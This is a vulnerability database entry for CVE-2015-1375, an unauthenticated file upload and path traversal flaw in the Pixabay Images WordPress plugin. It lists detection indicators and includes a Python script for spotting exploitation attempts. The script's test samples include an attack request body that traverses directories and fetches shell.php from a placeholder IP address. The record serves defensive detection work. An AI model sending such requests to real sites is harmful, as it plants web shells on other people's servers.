CVE-2015-1375
Published 2015-01-28
Priority P2 (64) · high · CVSS 2.0 base score 7.5 · vector AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT · EPSS 12.25% (95.7th percentile)
pixabay-images.php in the Pixabay Images plugin before 2.4 for WordPress does not properly restrict access to the upload functionality, which allows remote attackers to write to arbitrary files.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pixabay_images_project | pixabay_images | <= 2.3 | — |
Detection & IOCs (extracted from sources)
- Look for unauthenticated POST requests to /wp-admin/ containing the parameter 'pixabay_upload=1', which indicates exploitation of the authentication bypass combined with arbitrary file upload.
- Detect path traversal attempts via the 'q' POST parameter containing sequences such as '../../' targeting the Pixabay Images plugin upload functionality.
- Monitor for POST requests with Content-Type 'application/x-www-form-urlencoded' to /wp-admin/ containing both 'pixabay_upload' and 'image_url' parameters, especially where image_url points to an external or attacker-controlled host serving PHP files.
- The plugin does not validate the host in the provided download URL; alert on 'image_url' values referencing non-Pixabay domains, particularly those ending in .php.
- The authentication bypass means exploitation requires NO valid WordPress credentials; any unauthenticated remote attacker can trigger the upload endpoint.
- Path traversal via the 'q' parameter allows files to be written outside the intended 'download' folder, meaning uploaded shells may land anywhere on the filesystem accessible to the web server.
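As an added illustration of the indicators above (not part of this record and not the plugin's own code), the following Python request inspector applies them to parsed POST requests. The request dict layout, the `pixabay.com` allow-list and the sample request bodies are assumptions constructed for the example.

```python
"""Request-level checks for the CVE-2015-1375 indicators. Expects requests parsed into
dicts with keys method, path, content_type, body (form-urlencoded) and authenticated."""
from urllib.parse import parse_qs, urlparse

# Assumption: the only legitimate host the plugin should download images from.
PIXABAY_HOSTS = ("pixabay.com",)

def host_is_pixabay(url):
    host = (urlparse(url).hostname or "").lower()
    return any(host == h or host.endswith("." + h) for h in PIXABAY_HOSTS)

def inspect_request(req):
    """Return the names of the indicators that fire for one parsed request."""
    findings = []
    if req.get("method") != "POST" or not req.get("path", "").startswith("/wp-admin/"):
        return findings
    if "application/x-www-form-urlencoded" not in req.get("content_type", ""):
        return findings
    params = parse_qs(req.get("body", ""), keep_blank_values=True)
    def first(name):
        return params.get(name, [""])[0]
    # Indicator 1: upload endpoint reached without a valid WordPress session.
    if first("pixabay_upload") == "1" and not req.get("authenticated", False):
        findings.append("unauthenticated_pixabay_upload")
    # Indicator 2: traversal sequences in the 'q' parameter (controls the write path).
    if "../" in first("q") or "..\\" in first("q"):
        findings.append("path_traversal_in_q")
    # Indicators 3 and 4: image_url next to pixabay_upload, off-site host or .php target.
    image_url = first("image_url")
    if "pixabay_upload" in params and image_url:
        if not host_is_pixabay(image_url):
            findings.append("image_url_non_pixabay_host")
        if urlparse(image_url).path.lower().endswith(".php"):
            findings.append("image_url_php_file")
    return findings

def _post(body, authenticated, path="/wp-admin/"):  # builder for constructed samples
    return {"method": "POST", "path": path, "authenticated": authenticated,
            "content_type": "application/x-www-form-urlencoded", "body": body}

SAMPLE_REQUESTS = {  # constructed samples, not captured traffic
    "legit": _post("pixabay_upload=1&q=sunset&image_url=https%3A%2F%2Fpixabay.com%2Fget%2Fsunset.jpg", True),
    "attack": _post("pixabay_upload=1&q=..%2F..%2F&image_url=http%3A%2F%2F203.0.113.5%2Fshell.php", False),
    "get": {"method": "GET", "path": "/wp-admin/", "authenticated": False, "content_type": "", "body": ""},
}

def scan(requests=SAMPLE_REQUESTS):
    """Map each request name to its findings; an empty list means nothing fired."""
    return {name: inspect_request(req) for name, req in requests.items()}
```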
No detection rules found.
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/130017/WordPress-Pixarbay-Images-2.3-XSS-Bypass-Upload-Traversal.html
- http://seclists.org/fulldisclosure/2015/Jan/75
- http://www.exploit-db.com/exploits/35846
- http://www.openwall.com/lists/oss-security/2015/01/25/5
- http://www.osvdb.org/117146
- http://www.securityfocus.com/archive/1/534505/100/0/threaded
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=1067992%40pixabay-images%2Ftrunk%2Fpixabay-images.php&old=926633%40pixabay-images%2Ftrunk%2Fpixabay-images.php